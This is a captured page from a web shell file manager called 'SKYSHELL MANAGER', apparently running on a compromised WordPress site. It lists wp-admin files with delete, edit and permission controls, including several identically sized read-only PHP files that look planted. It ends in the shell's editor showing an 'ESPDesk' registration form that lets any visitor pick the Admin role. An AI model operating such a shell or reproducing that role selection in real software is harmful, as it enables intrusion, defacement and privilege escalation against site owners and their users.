📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: register.php
<?php session_start(); $registerError = ""; $registerSuccess = ""; if (isset($_SESSION['register_error'])) { $registerError = $_SESSION['register_error']; unset($_SESSION['register_error']); } if (isset($_SESSION['register_success'])) { $registerSuccess = $_SESSION['register_success']; unset($_SESSION['register_success']); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Register - ESPDesk</title> <link rel="icon" type="image/svg+xml" href="images/favicon.svg"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.3.3/css/bootstrap.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-icons/1.11.3/font/bootstrap-icons.min.css"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/style.css"> </head> <body> <div class="login-wrap"> <div class="login-card w-100"> <div class="row g-0"> <div class="col-lg-5 login-side"> <a href="#" class="d-flex align-items-center gap-2 text-white fw-bold fs-4 mb-4 text-decoration-none"> <img src="images/logo-mark.svg" width="30px" alt="ESPDesk"> ESPDesk </a> <h3 class="fw-bold mb-3">Submit, track, and manage server requests with ease</h3> <ul class="list-unstyled"> <li><i class="bi bi-check-circle-fill mt-1"></i> Submit server provisioning and technical requests in minutes</li> <li><i class="bi bi-check-circle-fill mt-1"></i> Track request status from Pending to Completed in real time</li> <li><i class="bi bi-check-circle-fill mt-1"></i> View complete request history and progress from your dashboard</li> </ul> </div> <div class="col-lg-7 login-form-side"> <h4 class="fw-bold mb-1">Create an account</h4> <p class="text-muted mb-4">Fill in the details below to register for ESPDesk.</p> <?php if($registerError != "") { ?> <div class="alert alert-danger alert-dismissible fade show" role="alert"> <strong>Registration Failed!</strong><br> <?php echo htmlspecialchars($registerError); ?> <button type="button" class="btn-close" data-bs-dismiss="alert"></button> </div> <?php } ?> <?php if($registerSuccess != "") { ?> <div class="alert alert-success alert-dismissible fade show" role="alert"> <strong>Success!</strong><br> <?php echo htmlspecialchars($registerSuccess); ?> <button type="button" class="btn-close" data-bs-dismiss="alert"></button> </div> <?php } ?> <form action="register-process.php" method="post" class="needs-validation" novalidate> <!-- Username / Email --> <div class="mb-3"> <label for="regUsername" class="form-label fw-semibold">User name / Email</label> <input type="email" id="regUsername" name="username" class="form-control form-control-lg" placeholder="name@company.com" required> <div class="invalid-feedback">Please enter a valid username/email.</div> </div> <!-- Company --> <div class="mb-3"> <label for="regCompany" class="form-label fw-semibold">Company Name</label> <input type="text" id="regCompany" name="company" class="form-control form-control-lg" placeholder="e.g. Acme Corp" required> <div class="invalid-feedback">Please enter your company name.</div> </div> <!-- Password --> <div class="mb-3"> <label for="regPassword" class="form-label fw-semibold">Password</label> <input type="password" id="regPassword" name="password" class="form-control form-control-lg" placeholder="��������" required minlength="6"> <div class="invalid-feedback">Password must be at least 6 characters long.</div> </div> <!-- Role --> <div class="mb-4"> <label for="regRole" class="form-label fw-semibold">Account Role</label> <select id="regRole" name="role" class="form-select form-select-lg" required> <option value="User" selected>User</option> <option value="Admin">Admin</option> </select> <div class="invalid-feedback">Please select a role.</div> </div> <button type="submit" class="btn btn-brand btn-lg w-100 mb-3">Create Account</button> <p class="text-center text-muted mb-0"> Already have an account? <a href="login.php" class="text-decoration-none fw-semibold">Sign in</a> </p> </form> </div> </div> </div> </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.3.3/js/bootstrap.bundle.min.js"></script> <script src="js/app.js"></script> <script> // Client-side Bootstrap validation (() => { 'use strict' const forms = document.querySelectorAll('.needs-validation') Array.from(forms).forEach(form => { form.addEventListener('submit', event => { if (!form.checkValidity()) { event.preventDefault() event.stopPropagation() } form.classList.add('was-validated') }, false) }) })() </script> </body> </html>
Save